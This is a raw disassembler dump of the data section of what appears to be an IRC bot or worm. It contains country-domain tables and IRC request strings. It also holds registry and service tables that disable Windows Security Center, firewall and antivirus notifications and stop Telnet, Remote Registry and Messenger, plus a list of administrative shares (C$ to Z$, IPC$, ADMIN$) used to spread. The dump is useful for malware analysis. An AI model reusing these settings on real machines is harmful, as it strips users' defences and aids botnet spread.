a_tr db '.tr',0 ; DATA XREF: sub_41912B:loc_419861�o
aTokelauIsland db 'Tokelau Island',0 ; DATA XREF: sub_41912B+72C�o
align 4
a_tk db '.tk',0 ; DATA XREF: sub_41912B:loc_419846�o
aThailand db 'Thailand',0 ; DATA XREF: sub_41912B+711�o
align 4
a_th db '.th',0 ; DATA XREF: sub_41912B:loc_41982B�o
aRussia db 'Russia',0 ; DATA XREF: sub_41912B:loc_419821�o
align 4
a_su db '.su',0 ; DATA XREF: sub_41912B+6E5�o
a_st db '.st',0 ; DATA XREF: sub_41912B:loc_4197FB�o
aSlovakia db 'Slovakia',0 ; DATA XREF: sub_41912B+6C6�o
align 4
a_sk db '.sk',0 ; DATA XREF: sub_41912B:loc_4197E0�o
aSlovenia db 'Slovenia',0 ; DATA XREF: sub_41912B+6AB�o
align 4
a_si db '.si',0 ; DATA XREF: sub_41912B:loc_4197C5�o
aSingapore db 'Singapore',0 ; DATA XREF: sub_41912B+690�o
align 4
a_sg db '.sg',0 ; DATA XREF: sub_41912B:loc_4197AA�o
aSweden db 'Sweden',0 ; DATA XREF: sub_41912B+675�o
align 4
a_se db '.se',0 ; DATA XREF: sub_41912B:loc_41978F�o
aSaudiArabia db 'Saudi Arabia',0 ; DATA XREF: sub_41912B+65A�o
align 4
off_442378 dd offset word_61732E ; DATA XREF: sub_41912B+649�o
dword_44237C dd 75722Eh aRomania db 'Romania',0 ; DATA XREF: sub_41912B+62A�o
a_ro db '.ro',0 ; DATA XREF: sub_41912B:loc_419744�o
aPortugal db 'Portugal',0 ; DATA XREF: sub_41912B+60F�o
align 4
a_pt db '.pt',0 ; DATA XREF: sub_41912B:loc_419729�o
aPoland db 'Poland',0 ; DATA XREF: sub_41912B:loc_41971F�o
align 4
a_pl db '.pl',0 ; DATA XREF: sub_41912B:loc_41970E�o
aNewZealand db 'New Zealand',0 ; DATA XREF: sub_41912B+5D9�o
a_nz db '.nz',0 ; DATA XREF: sub_41912B:loc_4196F3�o
aJapan db 'Japan',0 ; DATA XREF: sub_41912B:loc_4196E9�o
align 10h
a_nu db '.nu',0 ; DATA XREF: sub_41912B:loc_4196D8�o
aNorway db 'Norway',0 ; DATA XREF: sub_41912B+5A3�o
align 4
a_no db '.no',0 ; DATA XREF: sub_41912B:loc_4196BD�o
aNetherlands db 'Netherlands',0 ; DATA XREF: sub_41912B+588�o
a_nl db '.nl',0 ; DATA XREF: sub_41912B:loc_4196A2�o
aMicrosoftLine db 'Microsoft Line',0 ; DATA XREF: sub_41912B+56D�o
align 10h
a_ms db '.ms',0 ; DATA XREF: sub_41912B:loc_419687�o
aMalaysia db 'Malaysia',0 ; DATA XREF: sub_41912B+552�o
align 10h
a_my db '.my',0 ; DATA XREF: sub_41912B:loc_41966C�o
aMalta db 'Malta',0 ; DATA XREF: sub_41912B+537�o
align 4
off_44240C dd offset word_616D2E ; DATA XREF: sub_41912B:loc_419651�o
aLatvia db 'Latvia',0 ; DATA XREF: sub_41912B+51C�o
align 4
a_lv db '.lv',0 ; DATA XREF: sub_41912B:loc_419636�o
aLithuania db 'Lithuania',0 ; DATA XREF: sub_41912B+501�o
align 4
a_lt db '.lt',0 ; DATA XREF: sub_41912B:loc_41961B�o
aKazakhstan db 'Kazakhstan',0 ; DATA XREF: sub_41912B+4E6�o
align 4
a_kz db '.kz',0 ; DATA XREF: sub_41912B:loc_419600�o
aKorea db 'Korea',0 ; DATA XREF: sub_41912B+4CB�o
align 4
a_kr db '.kr',0 ; DATA XREF: sub_41912B:loc_4195E5�o
aKyrgyzstan db 'Kyrgyzstan',0 ; DATA XREF: sub_41912B+4B0�o
align 4
a_kg db '.kg',0 ; DATA XREF: sub_41912B+49F�o
a_jp db '.jp',0 ; DATA XREF: sub_41912B:loc_4195B5�o
aItaly db 'Italy',0 ; DATA XREF: sub_41912B+480�o
align 4
a_it db '.it',0 ; DATA XREF: sub_41912B:loc_41959A�o
aIsrael db 'Israel',0 ; DATA XREF: sub_41912B+465�o
align 10h
a_il db '.il',0 ; DATA XREF: sub_41912B:loc_41957F�o
aIceland db 'Iceland',0 ; DATA XREF: sub_41912B+44A�o
a_is db '.is',0 ; DATA XREF: sub_41912B:loc_419564�o
aIndia db 'India',0 ; DATA XREF: sub_41912B+42F�o
align 4
a_in db '.in',0 ; DATA XREF: sub_41912B:loc_419549�o
aIreland db 'Ireland',0 ; DATA XREF: sub_41912B+414�o
a_ie db '.ie',0 ; DATA XREF: sub_41912B:loc_41952E�o
aIndonesia db 'Indonesia',0 ; DATA XREF: sub_41912B+3F9�o
align 4
a_id db '.id',0 ; DATA XREF: sub_41912B:loc_419513�o
aHungary db 'Hungary',0 ; DATA XREF: sub_41912B+3DE�o
a_hu db '.hu',0 ; DATA XREF: sub_41912B:loc_4194F8�o
aHongKong db 'Hong Kong',0 ; DATA XREF: sub_41912B+3C3�o
align 10h
a_hk db '.hk',0 ; DATA XREF: sub_41912B:loc_4194DD�o
aGreece db 'Greece',0 ; DATA XREF: sub_41912B+3A8�o
align 4
a_gr db '.gr',0 ; DATA XREF: sub_41912B:loc_4194C2�o
aGeorgia db 'Georgia',0 ; DATA XREF: sub_41912B+38D�o
a_ge db '.ge',0 ; DATA XREF: sub_41912B:loc_4194A7�o
aFrance db 'France',0 ; DATA XREF: sub_41912B+372�o
align 4
a_fr db '.fr',0 ; DATA XREF: sub_41912B:loc_41948C�o
aFiji db 'FiJi',0 ; DATA XREF: sub_41912B+357�o
align 10h
a_fj db '.fj',0 ; DATA XREF: sub_41912B:loc_419471�o
aFinland db 'Finland',0 ; DATA XREF: sub_41912B+33C�o
a_fi db '.fi',0 ; DATA XREF: sub_41912B:loc_419456�o
aSpain db 'Spain',0 ; DATA XREF: sub_41912B+321�o
align 4
a_es db '.es',0 ; DATA XREF: sub_41912B:loc_41943B�o
aEstonia db 'Estonia',0 ; DATA XREF: sub_41912B+306�o
a_ee db '.ee',0 ; DATA XREF: sub_41912B:loc_419420�o
aDenmark db 'Denmark',0 ; DATA XREF: sub_41912B+2EB�o
a_dk db '.dk',0 ; DATA XREF: sub_41912B:loc_419405�o
aGermany db 'Germany',0 ; DATA XREF: sub_41912B+2D0�o
a_de db '.de',0 ; DATA XREF: sub_41912B:loc_4193EA�o
aCzechRepublic db 'Czech Republic',0 ; DATA XREF: sub_41912B+2B5�o
align 10h
a_cz db '.cz',0 ; DATA XREF: sub_41912B+2A4�o
a_cx db '.cx',0 ; DATA XREF: sub_41912B:loc_4193BA�o
aUruguay db 'Uruguay',0 ; DATA XREF: sub_41912B:loc_4193B0�o
a_cr db '.cr',0 ; DATA XREF: sub_41912B:loc_41939F�o
aCorpLine db 'Corp Line',0 ; DATA XREF: sub_41912B+26A�o
align 10h
a_co db '.co',0 ; DATA XREF: sub_41912B:loc_419384�o
aChina db 'China',0 ; DATA XREF: sub_41912B:loc_41937A�o
align 4
a_cn db '.cn',0 ; DATA XREF: sub_41912B:loc_419369�o
aChile db 'Chile',0 ; DATA XREF: sub_41912B+234�o
align 4
a_cl db '.cl',0 ; DATA XREF: sub_41912B:loc_41934E�o
aSwitzerland db 'Switzerland',0 ; DATA XREF: sub_41912B+219�o
a_ch db '.ch',0 ; DATA XREF: sub_41912B+208�o
off_44258C dd offset word_63632E ; DATA XREF: sub_41912B:loc_41931E�o
off_442590 dd offset word_61632E ; DATA XREF: sub_41912B:loc_419303�o
aBelarus db 'Belarus',0 ; DATA XREF: sub_41912B+1CE�o
a_by db '.by',0 ; DATA XREF: sub_41912B:loc_4192E8�o
aBrazil db 'Brazil',0 ; DATA XREF: sub_41912B+1B3�o
align 4
a_br db '.br',0 ; DATA XREF: sub_41912B:loc_4192CD�o
aBulgaria db 'Bulgaria',0 ; DATA XREF: sub_41912B+198�o
align 4
a_bg db '.bg',0 ; DATA XREF: sub_41912B:loc_4192B2�o
aBelgium db 'Belgium',0 ; DATA XREF: sub_41912B+17D�o
a_be db '.be',0 ; DATA XREF: sub_41912B:loc_419297�o
aAustralia db 'Australia',0 ; DATA XREF: sub_41912B+162�o
align 4
a_au db '.au',0 ; DATA XREF: sub_41912B:loc_41927C�o
aAustria db 'Austria',0 ; DATA XREF: sub_41912B+147�o
a_at db '.at',0 ; DATA XREF: sub_41912B+136�o
a_ar db '.ar',0 ; DATA XREF: sub_41912B+121�o
off_4425E8 dd offset word_63612E ; DATA XREF: sub_41912B:loc_419237�o
dword_4425EC dd 74696E55h, 4B206465h, 64676E69h, 6D6Fhdword_4425FC dd 6B752Eh aEducationDept_ db 'Education Dept. Line',0 ; DATA XREF: sub_41912B+E7�o
align 4
a_edu db '.edu',0 ; DATA XREF: sub_41912B:loc_419201�o
align 10h
aMilitaryLine db 'Military Line',0 ; DATA XREF: sub_41912B+CC�o
align 10h
a_mil db '.mil',0 ; DATA XREF: sub_41912B:loc_4191E6�o
align 4
aCompanyLine db 'Company Line',0 ; DATA XREF: sub_41912B+B1�o
align 4
a_com db '.com',0 ; DATA XREF: sub_41912B:loc_4191CB�o
; .text:off_44BB84�o
align 10h
aOrganisationLi db 'Organisation Line',0 ; DATA XREF: sub_41912B+96�o
align 4
a_org db '.org',0 ; DATA XREF: sub_41912B:loc_4191B0�o
align 4
aInformationalL db 'Informational Line',0 ; DATA XREF: sub_41912B+7B�o
align 10h
a_info db '.info',0 ; DATA XREF: sub_41912B:loc_419195�o
align 4
aNetworkLine db 'Network Line',0 ; DATA XREF: sub_41912B+60�o
align 4
a_net db '.net',0 ; DATA XREF: sub_41912B:loc_41917A�o
align 10h
aGovernmentLine db 'Government Line',0 ; DATA XREF: sub_41912B+45�o
a_gov db '.gov',0 ; DATA XREF: sub_41912B+34�o
align 4
aSPingRequestFr db '%s Ping request from: [%s!%s@%s]!',0 ; DATA XREF: sub_419B2F+38D�o
align 4
dword_4426DC dd 4E495001h, 73252047h, 0dword_4426E8 dd 4E495001h, 47haSVersionReques db '%s Version request from: [%s!%s@%s]!',0 ; DATA XREF: sub_419B2F+328�o
align 4
dword_442718 dd 52455601h, 4E4F4953h, 1732520h, 0dword_442728 dd 52455601h, 4E4F4953h, 1dword_442734 dd 25217325h, 73254073h, 0dword_442740 dd 2Bh ; sub_419F6A+8D�o
aTopic_0 db 'topic',0 ; DATA XREF: sub_419F6A+10C�o
align 4
a422 db '422',0 ; DATA XREF: sub_41A1C8+A9�o
a376 db '376',0 ; DATA XREF: sub_41A1C8+9C�o
a005 db '005',0 ; DATA XREF: sub_41A1C8+91�o
a366 db '366',0 ; DATA XREF: sub_41A1C8+7D�o
a332 db '332',0 ; DATA XREF: sub_41A1C8+6C�o
a302 db '302',0 ; DATA XREF: sub_41A1C8+5F�o
off_442764 dd offset dword_554B48 ; DATA XREF: sub_41A292+AB�o
aHkey_users db 'HKEY_USERS',0 ; DATA XREF: sub_41A292+9A�o
align 4
aHkcc db 'HKCC',0 ; DATA XREF: sub_41A292+89�o
align 4
aHkey_current_c db 'HKEY_CURRENT_CONFIG',0 ; DATA XREF: sub_41A292+78�o
aHkcr db 'HKCR',0 ; DATA XREF: sub_41A292+67�o
align 4
aHkey_classes_r db 'HKEY_CLASSES_ROOT',0 ; DATA XREF: sub_41A292+56�o
align 4
aHkcu db 'HKCU',0 ; DATA XREF: sub_41A292+45�o
; sub_41AA69+9B�o ...
align 4
aHkey_current_u db 'HKEY_CURRENT_USER',0 ; DATA XREF: sub_41A292+30�o
align 4
aHklm db 'HKLM',0 ; DATA XREF: sub_41A292+1B�o
; sub_41AA69+94�o ...
align 10h
aHkey_local_mac db 'HKEY_LOCAL_MACHINE',0 ; DATA XREF: sub_41A292+6�o
align 4
aDw db 'DW',0 ; DATA XREF: sub_41A370+60�o
align 4
aReg_dword db 'REG_DWORD',0 ; DATA XREF: sub_41A370+54�o
; sub_41A3EF:loc_41A420�o
align 4
aMu db 'MU',0 ; DATA XREF: sub_41A370+48�o
align 4
aReg_multi_sz db 'REG_MULTI_SZ',0 ; DATA XREF: sub_41A370+3C�o
; sub_41A3EF:loc_41A442�o
align 4
aEx db 'EX',0 ; DATA XREF: sub_41A370+30�o
align 4
aReg_expand_sz db 'REG_EXPAND_SZ',0 ; DATA XREF: sub_41A370+24�o
; sub_41A3EF:loc_41A40E�o
align 4
aSz db 'SZ',0 ; DATA XREF: sub_41A370+18�o
align 10h
aReg_sz db 'REG_SZ',0 ; DATA XREF: sub_41A370+C�o
; sub_41A3EF:loc_41A414�o
align 4
aReg_dword_big_ db 'REG_DWORD_BIG_ENDIAN',0 ; DATA XREF: sub_41A3EF:loc_41A44E�o
align 10h
aReg_link db 'REG_LINK',0 ; DATA XREF: sub_41A3EF:loc_41A448�o
align 4
aReg_qword db 'REG_QWORD',0 ; DATA XREF: sub_41A3EF:loc_41A43C�o
align 4
aUnknown_0 db 'UNKNOWN',0 ; DATA XREF: sub_41A3EF:loc_41A436�o
aReg_none db 'REG_NONE',0 ; DATA XREF: sub_41A3EF:loc_41A41A�o
align 4
aReg_binary db 'REG_BINARY',0 ; DATA XREF: sub_41A3EF+19�o
align 4
a_2dSSS db '(%.2d) %s\%s (%s)',0 ; DATA XREF: sub_41A60E+16A�o
align 4
aDefault db '(Default)',0 ; DATA XREF: sub_41A60E+149�o
align 4
a_2dSS db '(%.2d) %s\%s',0 ; DATA XREF: sub_41A60E+C0�o
align 4
off_4428A8 dd offset aTlntsvr ; DATA XREF: sub_41B0B0+2D�r
; "Tlntsvr"
dd offset aRemoteregistry ; "RemoteRegistry"
dd offset aMessenger ; "Messenger"
dd offset aSharedaccess ; "SharedAccess"
dd offset aWscsvc ; "wscsvc"
off_4428BC dd offset aTelnet ; DATA XREF: sub_41B0B0+6E�r
; sub_41B0B0+AB�r ...
; "Telnet"
dd offset aRemoteRegistry ; "Remote Registry"
dd offset aMessenger ; "Messenger"
dd offset aWindowsFirewal ; "Windows Firewall/ICS"
dd offset aSecurityCenter ; "Security Center"
dword_4428D0 dd 80000002h ; sub_41AA69:loc_41AAF3�r ...
aSoftwareMicr_5 db 'SOFTWARE\Microsoft\Security Center',0 ; DATA XREF: sub_41AA69+3A�r
; sub_41AA69+14E�r
align 4
dd 36h dup(0)
db 3 dup(0)
dword_4429D3 dd 61647055h ; sub_41AA69:loc_41ABAF�r
aTesdisablenoti db 'tesDisableNotify',0
dd 3Bh dup(0)
dword_442AD4 dd 4 dword_442AD8 dd 1 ; sub_41AA69+7C�r ...
dword_442ADC dd 0 ; sub_41AA69:loc_41AAED�r ...
dword_442AE0 dd 0 ; sub_41AA69+18B�r ...
dd 3Eh dup(0)
db 3 dup(0)
dword_442BDF dd 0 ; sub_41AA69+193�r ...
align 4
dd 3Fh dup(0)
dd 80000002h, 54464F53h, 45524157h, 63694D5Ch, 6F736F72h
dd 535C7466h, 72756365h, 20797469h, 746E6543h, 7265h, 36h dup(0)
dd 41000000h, 5669746Eh, 73757269h, 61736944h, 4E656C62h
dd 6669746Fh, 79h, 3Ah dup(0)
dd 4, 1, 81h dup(0)
dd 80000002h, 54464F53h, 45524157h, 63694D5Ch, 6F736F72h
dd 535C7466h, 72756365h, 20797469h, 746E6543h, 7265h, 36h dup(0)
dd 46000000h, 77657269h, 446C6C61h, 62617369h, 6F4E656Ch
dd 79666974h, 3Bh dup(0)
dd 4, 1, 81h dup(0)
dd 80000002h, 54464F53h, 45524157h, 63694D5Ch, 6F736F72h
dd 535C7466h, 72756365h, 20797469h, 746E6543h, 7265h, 36h dup(0)
dd 41000000h, 5669746Eh, 73757269h, 7265764Fh, 65646972h
dd 3Ch dup(0)
dd 4, 1, 81h dup(0)
dd 80000002h, 54464F53h, 45524157h, 63694D5Ch, 6F736F72h
dd 535C7466h, 72756365h, 20797469h, 746E6543h, 7265h, 36h dup(0)
dd 46000000h, 77657269h, 4F6C6C61h, 72726576h, 656469h
dd 3Ch dup(0)
dd 4, 1, 81h dup(0)
dd 80000002h, 54464F53h, 45524157h, 6C6F505Ch, 65696369h
dd 694D5C73h, 736F7263h, 5C74666Fh, 646E6957h, 4673776Fh
dd 77657269h, 5C6C6C61h, 616D6F44h, 72506E69h, 6C69666Fh
dd 65h, 30h dup(0)
dd 45000000h, 6C62616Eh, 72694665h, 6C617765h, 6Ch, 3Ch dup(0)
dd 4, 0
dd 1, 80h dup(0)
dd 80000002h, 54464F53h, 45524157h, 6C6F505Ch, 65696369h
dd 694D5C73h, 736F7263h, 5C74666Fh, 646E6957h, 4673776Fh
dd 77657269h, 5C6C6C61h, 6E617453h, 64726164h, 666F7250h
dd 656C69h, 30h dup(0)
dd 45000000h, 6C62616Eh, 72694665h, 6C617765h, 6Ch, 3Ch dup(0)
dd 4, 0
dd 1, 80h dup(0)
dd 80000002h, 54535953h, 435C4D45h, 65727275h, 6F43746Eh
dd 6F72746Eh, 7465536Ch, 7265535Ch, 65636976h, 73775C73h
dd 63767363h, 35h dup(0)
dd 53000000h, 74726174h, 3Fh dup(0)
dd 2 dup(4), 2, 80h dup(0)
dd 80000002h, 54535953h, 435C4D45h, 65727275h, 6F43746Eh
dd 6F72746Eh, 7465536Ch, 7265535Ch, 65636976h, 6C545C73h
dd 7653746Eh, 72h, 34h dup(0)
dd 53000000h, 74726174h, 3Fh dup(0)
dd 2 dup(4), 3, 78h dup(0)
db 3 dup(0)
byte_444D43 db 0 ; DATA XREF: .text:off_435C10�o
dd 7 dup(0)
dd 80000002h, 54535953h, 435C4D45h, 65727275h, 6F43746Eh
dd 6F72746Eh, 7465536Ch, 7265535Ch, 65636976h, 65525C73h
dd 65746F6Dh, 69676552h, 79727473h, 33h dup(0)
dd 53000000h, 74726174h, 3Fh dup(0)
dd 2 dup(4), 2, 80h dup(0)
dd 80000002h, 54535953h, 435C4D45h, 65727275h, 6F43746Eh
dd 6F72746Eh, 7465536Ch, 7265535Ch, 65636976h, 654D5C73h
dd 6E657373h, 726567h, 34h dup(0)
dd 53000000h, 74726174h, 3Fh dup(0)
dd 3 dup(4), 80h dup(0)
dd 80000002h, 54535953h, 435C4D45h, 65727275h, 6F43746Eh
dd 6F72746Eh, 7465536Ch, 6E6F435Ch, 6C6F7274h, 61734C5Ch
dd 36h dup(0)
dd 72000000h, 72747365h, 61746369h, 796E6F6Eh, 73756F6Dh
dd 3Ch dup(0)
dd 4, 1, 81h dup(0)
dd 80000002h, 54535953h, 435C4D45h, 65727275h, 6F43746Eh
dd 6F72746Eh, 7465536Ch, 7265535Ch, 65636976h, 616C5C73h
dd 6E616D6Eh, 76726573h, 705C7265h, 6D617261h, 72657465h
dd 73h, 30h dup(0)
dd 41000000h, 536F7475h, 65726168h, 736B57h, 3Dh dup(0)
dd 4, 0
dd 1, 80h dup(0)
dd 80000002h, 54535953h, 435C4D45h, 65727275h, 6F43746Eh
dd 6F72746Eh, 7465536Ch, 7265535Ch, 65636976h, 616C5C73h
dd 6E616D6Eh, 76726573h, 705C7265h, 6D617261h, 72657465h
dd 73h, 30h dup(0)
dd 41000000h, 536F7475h, 65726168h, 76726553h, 7265h, 3Ch dup(0)
dd 4, 0
dd 1, 80h dup(0)
dd 80000002h, 54535953h, 435C4D45h, 65727275h, 6F43746Eh
dd 6F72746Eh, 7465536Ch, 7265535Ch, 65636976h, 616C5C73h
dd 6E616D6Eh, 6B726F77h, 74617473h, 5C6E6F69h, 61726170h
dd 6574656Dh, 7372h, 2Fh dup(0)
dd 41000000h, 536F7475h, 65726168h, 736B57h, 3Dh dup(0)
dd 4, 0
dd 1, 80h dup(0)
dd 80000002h, 54535953h, 435C4D45h, 65727275h, 6F43746Eh
dd 6F72746Eh, 7465536Ch, 7265535Ch, 65636976h, 616C5C73h
dd 6E616D6Eh, 6B726F77h, 74617473h, 5C6E6F69h, 61726170h
dd 6574656Dh, 7372h, 2Fh dup(0)
dd 41000000h, 536F7475h, 65726168h, 76726553h, 7265h, 3Ch dup(0)
dd 4, 0
dd 1, 80h dup(0)
dd 80000002h, 54464F53h, 45524157h, 6C6F505Ch, 65696369h
dd 694D5C73h, 736F7263h, 5C74666Fh, 646E6957h, 5C73776Fh
dd 646E6957h, 5573776Fh, 74616470h, 65h, 32h dup(0)
dd 44000000h, 746F4E6Fh, 6F6C6C41h, 53505877h, 3250h, 3Ch dup(0)
dd 4, 1, 81h dup(0)
dd 80000002h, 74666F53h, 65726177h, 63694D5Ch, 6F736F72h
dd 4F5C7466h, 454Ch, 39h dup(0)
dd 45000000h, 6C62616Eh, 4F434465h, 4Dh, 3Dh dup(0)
dd 1, 2 dup(0)
dd 4Eh, 3Eh dup(0)
dd 59000000h, 40h dup(0)
off_4471F0 dd offset off_447590 ; DATA XREF: sub_41AD33+85�r
; sub_41AD33:loc_41ADF0�r ...
dword_4471F4 dd 0 dd offset off_447580
align 10h
dd offset off_447570
align 8
dd offset aC_2 ; "C$"
dd offset aC_3 ; "C:\\"
dd offset aD_1 ; "D$"
dd offset aD_2 ; "D:\\"
dd offset aE_2 ; "E$"
dd offset aE_3 ; "E:\\"
dd offset aF_1 ; "F$"
dd offset aF_2 ; "F:\\"
dd offset aG_1 ; "G$"
dd offset aG_2 ; "G:\\"
dd offset asc_447518 ; "H$"
dd offset asc_447510 ; "H:\\"
dd offset aI_3 ; "I$"
dd offset aI_4 ; "I:\\"
dd offset aJ_1 ; "J$"
dd offset aJ_2 ; "J:\\"
dd offset aJ_1 ; "J$"
dd offset aJ_2 ; "J:\\"
dd offset aK_2 ; "K$"
dd offset aK_3 ; "K:\\"
dd offset asc_4474D8 ; "L$"
dd offset asc_4474D0 ; "L:\\"
dd offset aM_5 ; "M$"
dd offset aM_6 ; "M:\\"
dd offset aN_2 ; "N$"
dd offset aN_3 ; "N:\\"
dd offset aO_2 ; "O$"
dd offset aO_3 ; "O:\\"
dd offset aP_5 ; "P$"
dd offset aP_6 ; "P:\\"
dd offset aQ_2 ; "Q$"
dd offset aQ_3 ; "Q:\\"
dd offset aR_1 ; "R$"
dd offset aR_2 ; "R:\\"
dd offset aS_10 ; "S$"
dd offset aS_9 ; "S:\\"
dd offset aT_1 ; "T$"
dd offset aT_2 ; "T:\\"
dd offset aU_3 ; "U$"
dd offset aU_2 ; "U:\\"
dd offset aV_2 ; "V$"
dd offset aV_3 ; "V:\\"
dd offset aW_1 ; "W$"
dd offset aW_2 ; "W:\\"
dd offset asc_447418 ; "X$"
dd offset asc_447410 ; "X:\\"
dd offset aY_1 ; "Y$"
dd offset aY_2 ; "Y:\\"
dd offset aZ_5 ; "Z$"
dd offset aZ_6 ; "Z:\\"
dd offset off_447570
dd offset off_4473DC
dd offset off_447580
dd offset off_4473CC
dd offset off_447590
dd offset off_4473C0
dd offset off_447590
dd offset off_4473B4
dd offset off_447590
dd offset off_4473A0
dd offset off_447590
dd offset aWkssvc ; "wkssvc\\"
dd offset off_447590
dd offset aSrvsvc ; "srvsvc\\"
dd offset off_44736C
dd offset aNetlogon_0 ; "netlogon\\"
dd offset off_447590
dd offset aTsclient ; "tsclient\\"
dd offset off_447590
dd offset aTsweb ; "tsweb\\"
dd offset off_447590
dd offset off_447328
off_447328 dd offset dword_50004C ; DATA XREF: .text:00447324�o
dd offset dword_520054
dd 5Ch
aTsweb: ; DATA XREF: .text:0044731C�o
unicode 0, <tsweb\>,0
align 4
aTsclient: ; DATA XREF: .text:00447314�o
unicode 0, <tsclient\>,0
aNetlogon_0: ; DATA XREF: .text:0044730C�o
unicode 0, <netlogon\>,0
off_44736C dd offset word_45004E ; DATA XREF: .text:00447308�o
dd offset dword_4C0054
dd offset byte_47004F
dd offset byte_4E004F
dd 24h
aSrvsvc: ; DATA XREF: .text:00447304�o
unicode 0, <srvsvc\>,0
aWkssvc: ; DATA XREF: .text:004472FC�o
unicode 0, <wkssvc\>,0
off_4473A0 dd offset word_520042 ; DATA XREF: .text:004472F4�o
dd offset byte_57004F
dd offset byte_450053
dd offset word_5C0052
dd 0
off_4473B4 dd offset dword_490050 ; DATA XREF: .text:004472EC�o
dd offset byte_450050
dd 5Ch
off_4473C0 dd offset byte_500049 ; DATA XREF: .text:004472E4�o
dd offset byte_5C0043
dd 0
off_4473CC dd offset aTasklist_exe+5 ; DATA XREF: .text:004472DC�o
dd offset byte_49004D
dd offset word_5C004E
dd 0
off_4473DC dd offset dword_520050 ; DATA XREF: .text:004472D4�o
dd offset byte_4E0049
dd offset dword_450054
dd offset word_5C0052
align 10h
aZ_6: ; DATA XREF: .text:004472CC�o
unicode 0, <Z:\>,0
aZ_5: ; DATA XREF: .text:004472C8�o
unicode 0, <Z$>,0
align 10h
aY_2: ; DATA XREF: .text:004472C4�o
unicode 0, <Y:\>,0
aY_1: ; DATA XREF: .text:004472C0�o
unicode 0, <Y$>,0
align 10h
asc_447410: ; DATA XREF: .text:004472BC�o
unicode 0, <X:\>,0
asc_447418: ; DATA XREF: .text:004472B8�o
unicode 0, <X$>,0
align 10h
aW_2: ; DATA XREF: .text:004472B4�o
unicode 0, <W:\>,0
aW_1: ; DATA XREF: .text:004472B0�o
unicode 0, <W$>,0
align 10h
aV_3: ; DATA XREF: .text:004472AC�o
unicode 0, <V:\>,0
aV_2: ; DATA XREF: .text:004472A8�o
unicode 0, <V$>,0
align 10h
aU_2: ; DATA XREF: .text:004472A4�o
unicode 0, <U:\>,0
aU_3: ; DATA XREF: .text:004472A0�o
unicode 0, <U$>,0
align 10h
aT_2: ; DATA XREF: .text:0044729C�o
unicode 0, <T:\>,0
aT_1: ; DATA XREF: .text:00447298�o
unicode 0, <T$>,0
align 10h
aS_9: ; DATA XREF: .text:00447294�o
unicode 0, <S:\>,0
aS_10: ; DATA XREF: .text:00447290�o
unicode 0, <S$>,0
align 10h
aR_2: ; DATA XREF: .text:0044728C�o
unicode 0, <R:\>,0
aR_1: ; DATA XREF: .text:00447288�o
unicode 0, <R$>,0
align 10h
aQ_3: ; DATA XREF: .text:00447284�o
unicode 0, <Q:\>,0
aQ_2: ; DATA XREF: .text:00447280�o
unicode 0, <Q$>,0
align 10h
aP_6: ; DATA XREF: .text:0044727C�o
unicode 0, <P:\>,0
aP_5: ; DATA XREF: .text:00447278�o
unicode 0, <P$>,0
align 10h
aO_3: ; DATA XREF: .text:00447274�o
unicode 0, <O:\>,0
aO_2: ; DATA XREF: .text:00447270�o
unicode 0, <O$>,0
align 10h
aN_3: ; DATA XREF: .text:0044726C�o
unicode 0, <N:\>,0
aN_2: ; DATA XREF: .text:00447268�o
unicode 0, <N$>,0
align 10h
aM_6: ; DATA XREF: .text:00447264�o
unicode 0, <M:\>,0
aM_5: ; DATA XREF: .text:00447260�o
unicode 0, <M$>,0
align 10h
asc_4474D0: ; DATA XREF: .text:0044725C�o
unicode 0, <L:\>,0
asc_4474D8: ; DATA XREF: .text:00447258�o
unicode 0, <L$>,0
align 10h
aK_3: ; DATA XREF: .text:00447254�o
unicode 0, <K:\>,0
aK_2: ; DATA XREF: .text:00447250�o
unicode 0, <K$>,0
align 10h
aJ_2: ; DATA XREF: .text:00447244�o
; .text:0044724C�o
unicode 0, <J:\>,0
aJ_1: ; DATA XREF: .text:00447240�o
; .text:00447248�o
unicode 0, <J$>,0
align 10h
aI_4: ; DATA XREF: .text:0044723C�o
unicode 0, <I:\>,0
aI_3: ; DATA XREF: .text:00447238�o
unicode 0, <I$>,0
align 10h
asc_447510: ; DATA XREF: .text:00447234�o
unicode 0, <H:\>,0
asc_447518: ; DATA XREF: .text:00447230�o
unicode 0, <H$>,0
align 10h
aG_2: ; DATA XREF: .text:0044722C�o
unicode 0, <G:\>,0
aG_1: ; DATA XREF: .text:00447228�o
unicode 0, <G$>,0
align 10h
aF_2: ; DATA XREF: .text:00447224�o
unicode 0, <F:\>,0
aF_1: ; DATA XREF: .text:00447220�o
unicode 0, <F$>,0
align 10h
aE_3: ; DATA XREF: .text:0044721C�o
unicode 0, <E:\>,0
aE_2: ; DATA XREF: .text:00447218�o
unicode 0, <E$>,0
align 10h
aD_2: ; DATA XREF: .text:00447214�o
unicode 0, <D:\>,0
aD_1: ; DATA XREF: .text:00447210�o
unicode 0, <D$>,0
align 10h
aC_3: ; DATA XREF: .text:0044720C�o
unicode 0, <C:\>,0
aC_2: ; DATA XREF: .text:00447208�o
unicode 0, <C$>,0
align 10h
off_447570 dd offset dword_520050 ; DATA XREF: .text:00447200�o
; .text:004472D0�o
dd offset byte_4E0049
aT_3:
unicode 0, <T$>,0
align 10h
off_447580 dd offset aTasklist_exe+5 ; DATA XREF: .text:004471F8�o
; .text:004472D8�o
dd offset byte_49004D
aN_4:
unicode 0, <N$>,0
align 10h
off_447590 dd offset byte_500049 ; DATA XREF: .text:off_4471F0�o
; .text:004472E0�o ...
aC_4:
unicode 0, <C$>,0
align 4
aSecurityCenter db 'Security Center',0 ; DATA XREF: .text:004428CC�o
aWindowsFirewal db 'Windows Firewall/ICS',0 ; DATA XREF: .text:004428C8�o
align 4
aRemoteRegistry db 'Remote Registry',0 ; DATA XREF: .text:004428C0�o
aTelnet db 'Telnet',0 ; DATA XREF: .text:off_4428BC�o
align 4
aWscsvc db 'wscsvc',0 ; DATA XREF: .text:004428B8�o
align 4
aSharedaccess db 'SharedAccess',0 ; DATA XREF: .text:004428B4�o
align 4
aMessenger db 'Messenger',0 ; DATA XREF: .text:004428B0�o
; .text:004428C4�o
align 10h
aRemoteregistry db 'RemoteRegistry',0 ; DATA XREF: .text:004428AC�o
align 10h
aTlntsvr db 'Tlntsvr',0 ; DATA XREF: .text:off_4428A8�o
aSRegistryS_2d_ db '%s Registry %s, (%.2d/%.2d)',0 ; DATA XREF: sub_41AA69+2AE�o
aSFailedToSRegi db '%s Failed to %s Registry, (%.2d/%.2d)',0 ; DATA XREF: sub_41AA69+275�o
align 4
aSecured db 'Secured',0 ; DATA XREF: sub_41AA69+25E�o
